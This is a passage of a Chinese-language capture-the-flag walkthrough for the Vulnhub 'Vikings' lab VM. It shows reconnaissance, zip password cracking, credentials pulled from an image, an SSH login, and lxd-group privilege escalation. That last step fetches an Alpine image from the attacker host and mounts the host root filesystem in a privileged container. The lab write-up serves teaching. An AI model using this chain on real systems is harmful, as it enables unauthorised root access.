Vulnhub之Vikings靶機超級詳細測試過程
阿新 • • 發佈:2022-12-09
Vikings
作者: jason_huawen
靶機基本資訊
名稱:Vikings: 1
地址:
https://www.vulnhub.com/entry/vikings-1,741/
識別目標主機IP地址
(kali㉿kali)-[~/Vulnhub/Vikings] └─$ sudo netdiscover -i eth1 Currently scanning: 172.16.137.0/16 | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor 192.168.56.100 08:00:27:89:29:07 2 120 PCS Systemtechnik GmbH 192.168.56.126 08:00:27:09:9a:d1 1 60 PCS Systemtechnik GmbH
利用Kali Linux自帶的netdiscover工具識別目標主機的IP地址為192.168.56.126
NMAP掃描
首先利用NMAP工具對目標主機進行全埠的掃描:
┌──(kali㉿kali)-[~/Vulnhub/Vikings] └─$ sudo nmap -sS -sV -sC -p- 192.168.56.126 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-09 00:23 EST Nmap scan report for bogon (192.168.56.126) Host is up (0.00036s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 59:d4:c0:fd:62:45:97:83:15:c0:15:b2:ac:25:60:99 (RSA) | 256 7e:37:f0:11:63:80:15:a3:d3:9d:43:c6:09:be:fb:da (ECDSA) |_ 256 52:e9:4f:71:bc:14:dc:00:34:f2:a7:b3:58:b5:0d:ce (ED25519) 80/tcp open http Apache httpd 2.4.29 | http-ls: Volume / | SIZE TIME FILENAME | - 2020-10-29 21:07 site/ |_ |_http-title: Index of / |_http-server-header: Apache/2.4.29 (Ubuntu) MAC Address: 08:00:27:09:9A:D1 (Oracle VirtualBox virtual NIC) Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 124.67 seconds
NMAP掃描結果表明目標主機有2個開放埠:22(SSH)、80(HTTP)
獲得Shell
由於目標主機SSH服務沒有可利用的漏洞,因此接下來主要對HTTP服務進行資訊的收集:
┌──(kali㉿kali)-[~/Vulnhub/Vikings] └─$ curl http://192.168.56.126 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /</title> </head> <body> <h1>Index of /</h1> <table> <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr> <tr><th colspan="5"><hr></th></tr> <tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="site/">site/</a></td><td align="right">2020-10-29 21:07 </td><td align="right"> - </td><td> </td></tr> <tr><th colspan="5"><hr></th></tr> </table> <address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address> </body></html> ┌──(kali㉿kali)-[~/Vulnhub/Vikings] └─$ curl http://192.168.56.126/robots.txt <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address> </body></html> ┌──(kali㉿kali)-[~/Vulnhub/Vikings] └─$ curl http://192.168.56.126/site <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://192.168.56.126/site/">here</a>.</p> <hr> <address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address> </body></html> ┌──(kali㉿kali)-[~/Vulnhub/Vikings] └─$ curl http://192.168.56.126/site/ <!DOCTYPE html> <!-- This site was created in Webflow. http://www.webflow.com --> <!-- Last Published: Fri May 01 2020 14:48:48 GMT+0000 (Coordinated Universal Time) --> <html data-wf-page="5ea837e8c81001b668dffd4a" data-wf-site="5ea837e8c8100167b2dffd49"> <head> <meta charset="utf-8"> <title>Split</title> <meta content="width=device-width, initial-scale=1" name="viewport"> <meta content="Webflow" name="generator"> <link href="css/normalize.css" rel="stylesheet" type="text/css"> <link href="css/webflow.css" rel="stylesheet" type="text/css"> <link href="css/split-opl.webflow.css" rel="stylesheet" type="text/css"> <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script> <script type="text/javascript">WebFont.load({ google: { families: ["Inter:regular,600","Lora:regular"] }});</script> <!-- [if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif] --> <script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script> <link href="images/favicon.png" rel="shortcut icon" type="image/x-icon"> <link href="images/webclip.jpg" rel="apple-touch-icon"> <style type="text/css"> body { -webkit-font-smoothing: antialiased; } </style> </head> <body class="body"> <div class="columns w-row"> <div class="leftcontent w-col w-col-6 w-col-stack"> <div data-w-id="b84f5156-c6e2-fb1d-6606-98a08030a472" style="opacity:0" class="image"></div> </div> <div class="rightcontent w-col w-col-6 w-col-stack"> <div data-w-id="3fd5aeb3-22da-ed60-7286-0d11f16597d3" style="opacity:0" class="content"> <div class="name">Ivar The Boneless</div> <h1 class="tagline"><strong class="bold-text">Mad King</strong></h1> <p class="bio">865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)</p> <div class="links w-row"> <div class="column w-col w-col-4"> <div class="text-block-2">Connect</div> <ul class="list w-list-unstyled"> <li><a href="#">Blog</a></li> <li><a href="#">Email</a></li> <li><a href="#">Newsletter</a></li> </ul> </div> <div class="column-2 w-col w-col-4"> <div class="text-block-2">social</div> <ul class="list w-list-unstyled"> <li><a href="#">Twitter</a></li> <li><a href="#">Instagram</a></li> <li><a href="#">Dribbble</a></li> </ul> </div> <div class="w-col w-col-4"> <div class="text-block-2">network</div> <ul class="list w-list-unstyled"> <li><a href="#">Link One</a></li> <li><a href="#">Link Two</a></li> <li><a href="#">Link Three</a></li> </ul> </div> </div> <div class="credit">©2020 Ivar The Boneless</div> </div> </div> </div> <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.4.1.min.220afd743d.js?site=5ea837e8c8100167b2dffd49" type="text/javascript" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="js/webflow.js" type="text/javascript"></script> <!-- [if lte IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif] --> </body> </html>
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ nikto -h http://192.168.56.126/site/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.126
+ Target Hostname: 192.168.56.126
+ Target Port: 80
+ Start Time: 2022-12-09 02:56:40 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Server may leak inodes via ETags, header found with file /site/, inode: 1143, size: 5b2d5ac892300, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3268: /site/css/: Directory indexing found.
+ OSVDB-3092: /site/css/: This might be interesting...
+ OSVDB-3268: /site/images/: Directory indexing found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-12-09 02:56:54 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
訪問/site/images目錄,內有3張圖片,將其下載到本地:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf split.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek split.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.22% (132.4 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf webclip.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek webclip.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.44% (132.7 MB)
[!] error: Could not find a valid passphrase.
看來這些圖片沒有什麼用處,接下來掃描一下目標主機有哪些目錄和檔案:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ gobuster dir -u http://192.168.56.126/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.126/site/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/09 03:00:04 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 322] [--> http://192.168.56.126/site/images/]
/css (Status: 301) [Size: 319] [--> http://192.168.56.126/site/css/]
/js (Status: 301) [Size: 318] [--> http://192.168.56.126/site/js/]
Progress: 218385 / 220561 (99.01%)===============================================================
2022/12/09 03:00:31 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ gobuster dir -u http://192.168.56.126/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.126/site/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/12/09 03:00:43 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/images (Status: 301) [Size: 322] [--> http://192.168.56.126/site/images/]
/index.html (Status: 200) [Size: 4419]
/css (Status: 301) [Size: 319] [--> http://192.168.56.126/site/css/]
/js (Status: 301) [Size: 318] [--> http://192.168.56.126/site/js/]
/war.txt (Status: 200) [Size: 13]
/.html (Status: 403) [Size: 279]
Progress: 1101000 / 1102805 (99.84%)===============================================================
2022/12/09 03:03:03 Finished
===============================================================
發現了/war.txt檔案,訪問該檔案:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/war.txt
/war-is-over
war.txt檔案中有個目錄,訪問該目錄,返回內容是經過編碼的,將其下載到本地:
很奇怪,從瀏覽器拷貝網頁內容到vim過程中,似乎進入了死迴圈,拷貝貼上無法停止的節奏。改變方法,不能直接從網頁上拷貝,而應該是用curl命令,並重定向:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/war-is-over/ > bigtext
看起來是base64編碼,然後解碼:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ cat bigtext| bas64 -d > decoded
cat decoded檔案發現是亂碼,用file命令檢視,發現該檔案是zip檔案:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext decoded nmap_full_scan split.jpg webclip.jpg
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ file decoded
decoded: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ mv decoded decoded.zip
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ unzip decoded.zip
Archive: decoded.zip
skipping: king need PK compat. v5.1 (can do v4.6)
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext decoded.zip nmap_full_scan split.jpg webclip.jpg
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ zip2john decoded.zip > zip_hash
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext decoded.zip nmap_full_scan split.jpg webclip.jpg zip_hash
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 1410760 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ragnarok123 (decoded.zip/king)
1g 0:00:00:09 DONE (2022-12-09 03:19) 0.1107g/s 33112p/s 33112c/s 33112C/s redsox#1..money66
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到了zip檔案的密碼,解壓縮decode.zip檔案:(用終端命令解壓縮有些問題,直接用圖形化介面中的extract,然後輸入密碼)
得到檔案: king, 是一副圖片。
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ file king
king: JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=14, height=4000, bps=0, PhotometricIntepretation=RGB, description=Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 100901071, orientation=upper-left, width=6000], baseline, precision 8, 1600x1067, components 3
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf king
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek king
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.62% (132.9 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ exiftool king
ExifTool Version Number : 12.44
File Name : king
Directory : .
File Size : 1430 kB
File Modification Date/Time : 2021:09:03 06:30:03-04:00
File Access Date/Time : 2022:12:09 03:27:07-05:00
File Inode Change Date/Time : 2022:12:09 03:26:48-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Big-endian (Motorola, MM)
Photometric Interpretation : RGB
Image Description : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
Orientation : Horizontal (normal)
Samples Per Pixel : 3
X Resolution : 300
Y Resolution : 300
Resolution Unit : inches
Software : Adobe Photoshop CC 2019 (Windows)
Modify Date : 2018:11:26 10:32:02
Artist : vlastas
Exif Version : 0221
Color Space : Uncalibrated
Exif Image Width : 1600
Exif Image Height : 1067
Compression : JPEG (old-style)
Thumbnail Offset : 558
Thumbnail Length : 5613
Current IPTC Digest : 73f42d7d127f00bdd0e556910f4a85a8
Coded Character Set : UTF8
Application Record Version : 4
Caption-Abstract : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
By-line : vlastas
Object Name : 1009010713
Original Transmission Reference : 53616c7465645f5f0f79ebad28071734
Keywords : 3d, ancient, attack, battle, boat, culture, dark, denmark, drakkar, dramatic, dusk, engraved, evening, history, illustration, invasion, leadership, longboat, men, nautical, nordic, norse, north, northern, norway, occupation, river, sail, sailboat, scandinavian, shield, ship, storm, stormy, sun, sunbeam, sunlight, sunrise, sunset, vandal, vessel, viking, viking ship, war, warrior, water, weather, wind, windstorm, wooden
IPTC Digest : 73f42d7d127f00bdd0e556910f4a85a8
Displayed Units X : inches
Displayed Units Y : inches
Print Style : Centered
Print Position : 0 0
Print Scale : 1
Global Angle : 30
Global Altitude : 30
URL List :
Slices Group Name : viking021
Num Slices : 1
Pixel Aspect Ratio : 1
Photoshop Thumbnail : (Binary data 5613 bytes, use -b option to extract)
Has Real Merged Data : Yes
Writer Name : Adobe Photoshop
Reader Name : Adobe Photoshop CC 2019
Photoshop Quality : 12
Photoshop Format : Standard
Progressive Scans : 3 Scans
XMP Toolkit : Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22
Format : image/jpeg
Legacy IPTC Digest : 250DA4DEC6F34E708125EF03F795F091
Transmission Reference : 53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50
Credit : Shutterstock / vlastas
Source : Shutterstock
Color Mode : RGB
ICC Profile Name :
Document ID : adobe:docid:photoshop:2d821c53-a3ca-e346-80f6-118a95cc9817
Instance ID : xmp.iid:5bef0ca9-3ef9-e44f-865c-f39bdc472764
Original Document ID : A609744630A618A935A1D637005C673F
Create Date : 2018:11:26 10:28:18-06:00
Metadata Date : 2018:11:26 10:32:02-06:00
Creator Tool : Adobe Photoshop CC 2019 (Windows)
Description : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
Title : 1009010713
Subject : 3d, ancient, attack, battle, boat, culture, dark, denmark, drakkar, dramatic, dusk, engraved, evening, history, illustration, invasion, leadership, longboat, men, nautical, nordic, norse, north, northern, norway, occupation, river, sail, sailboat, scandinavian, shield, ship, storm, stormy, sun, sunbeam, sunlight, sunrise, sunset, vandal, vessel, viking, viking ship, war, warrior, water, weather, wind, windstorm, wooden
Creator : vlastas
History Action : saved, converted, derived, saved, saved, converted, derived, saved
History Instance ID : xmp.iid:642d0712-667d-2d43-8e5e-dcde3e7be5bf, xmp.iid:f9584b87-136c-8c43-8d2b-121dfc42e1c3, xmp.iid:f312a9e4-c83e-5046-b32f-7d31285efcc6, xmp.iid:5bef0ca9-3ef9-e44f-865c-f39bdc472764
History When : 2018:11:26 10:31:55-06:00, 2018:11:26 10:31:55-06:00, 2018:11:26 10:32:02-06:00, 2018:11:26 10:32:02-06:00
History Software Agent : Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows)
History Changed : /, /, /, /
History Parameters : from image/jpeg to image/tiff, converted from image/jpeg to image/tiff, from image/tiff to image/jpeg, converted from image/tiff to image/jpeg
Derived From Instance ID : xmp.iid:f312a9e4-c83e-5046-b32f-7d31285efcc6
Derived From Document ID : adobe:docid:photoshop:a311ad0b-1bf9-f446-b96f-1960b71bb9bf
Derived From Original Document ID: A609744630A618A935A1D637005C673F
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 1600
Image Height : 1067
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1600x1067
Megapixels : 1.7
Thumbnail Image : (Binary data 5613 bytes, use -b option to extract)
圖片元資料中的transmission reference有點奇怪,
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50
Possible Hashs:
[+] SHA-256
[+] Haval-256
Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))
--------------------------------------------------
HASH: ^C
Bye!
用線上網站試圖破解該SHA256都失敗。這一段走了一些彎路,雖然總體方向沒有錯。
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ binwalk -e king
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, big-endian, offset of first image directory: 8
1429567 0x15D03F Zip archive data, at least v2.0 to extract, compressed size: 53, uncompressed size: 92, name: user
1429740 0x15D0EC End of Zip archive, footer length: 22
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext decoded.zip image_hash king _king.extracted nmap_full_scan split.jpg webclip.jpg zip_hash
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ cd _king.extracted
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ ls
15D03F.zip user
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ cat user
//FamousBoatbuilder_floki@vikings
//f@m0usboatbuilde7
用binwalk工具發現該圖片中有個user檔案,裡面有使用者名稱和密碼
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ ssh [email protected]
The authenticity of host '192.168.56.126 (192.168.56.126)' can't be established.
ED25519 key fingerprint is SHA256:volom5GRMcetvgfJsyVTXVnNY0FUA6W1k/5fsdHs9T4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.126' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Dec 9 08:37:30 UTC 2022
System load: 0.0 Processes: 95
Usage of /: 53.5% of 8.79GB Users logged in: 0
Memory usage: 39% IP address for enp0s3: 192.168.56.126
Swap usage: 0%
0 updates can be applied immediately.
You have mail.
Last login: Sat Sep 4 04:38:04 2021 from 10.42.0.1
floki@vikings:~$ id
uid=1000(floki) gid=1000(floki) groups=1000(floki),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
floki@vikings:~$
提權
通過id命令我們知道floki是lxc組成員,接下來用lxc許可權進行提權
將alpine-v3.13-x86_64-20210218_0139.tar.gz檔案上傳至靶機(該檔案可以從網上下載):
┌──(kali㉿kali)-[~/Vulnhub/Vikings/lxd-alpine-builder]
└─$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz build-alpine LICENSE README.md
┌──(kali㉿kali)-[~/Vulnhub/Vikings/lxd-alpine-builder]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
但是在靶機上下載該檔案時沒有成功,估計是8000埠被靶機防火牆阻斷掉了,需要將HTTP埠改為80:
floki@vikings:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:44:26-- http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... ^C
floki@vikings:/tmp$ ping 192.168.56.206
PING 192.168.56.206 (192.168.56.206) 56(84) bytes of data.
64 bytes from 192.168.56.206: icmp_seq=1 ttl=64 time=0.324 ms
^C
--- 192.168.56.206 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.324/0.324/0.324/0.000 ms
floki@vikings:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:45:25-- http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... ^C
floki@vikings:/tmp$ wget http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:45:41-- http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’
alpine-v3.13-x86_64-20210218_01 100%[=====================================================>] 3.11M --.-KB/s in 0.01s
2022-12-09 08:45:41 (209 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]
floki@vikings:/tmp$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-apache2.service-SaueZS
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-systemd-resolved.service-hZO7PK
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-systemd-timesyncd.service-SI92UJ
floki@vikings:/tmp$
floki@vikings:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
報錯,說沒有storage pool,那就用lxd命令初始化一下,建立storage pool,
floki@vikings:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
Error: Failed to create network 'lxdbr0': open /proc/sys/net/ipv6/conf/lxdbr0/autoconf: no such file or directory
一路回車,結果報錯,說無法建立網路,網上找解決方法,並沒有找到合適的方法,我就簡單粗暴的方法來處理,咱們就不用網路了唄,即: 重新初始化,在要建立網路的地方,回答no
floki@vikings:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
此次執行lxd init,沒有報錯,說明storage pool已經建立成功,那重新執行lxc
floki@vikings:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
The container you are starting doesn't have any network attached to it.
To create a new network, use: lxc network create
To attach a network to a container, use: lxc network attach
floki@vikings:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
floki@vikings:/tmp$ lxc start ignite
floki@vikings:/tmp$ lxc exec ignite /bin/sh
雖然提示沒有網路,但是整個過程已經可以順利進行,從而拿到了root shell
/mnt # cd root
/mnt/root # ls -alh
total 2G
drwxr-xr-x 24 root root 4.0K Sep 3 2021 .
drwxr-xr-x 1 root root 8 Dec 9 08:56 ..
drwxr-xr-x 2 root root 4.0K Sep 4 2021 bin
drwxr-xr-x 4 root root 4.0K Sep 4 2021 boot
drwxr-xr-x 2 root root 4.0K Sep 3 2021 cdrom
drwxr-xr-x 19 root root 3.8K Dec 9 04:47 dev
drwxr-xr-x 105 root root 4.0K Sep 4 2021 etc
drwxr-xr-x 4 root root 4.0K Sep 3 2021 home
lrwxrwxrwx 1 root root 34 Sep 3 2021 initrd.img -> boot/initrd.img-4.15.0-154-generic
lrwxrwxrwx 1 root root 34 Sep 3 2021 initrd.img.old -> boot/initrd.img-4.15.0-154-generic
drwxr-xr-x 23 root root 4.0K Sep 3 2021 lib
drwxr-xr-x 2 root root 4.0K Sep 3 2021 lib64
drwx------ 2 root root 16.0K Sep 3 2021 lost+found
drwxr-xr-x 2 root root 4.0K Aug 6 2020 media
drwxr-xr-x 2 root root 4.0K Aug 6 2020 mnt
drwxr-xr-x 3 root root 4.0K Sep 3 2021 opt
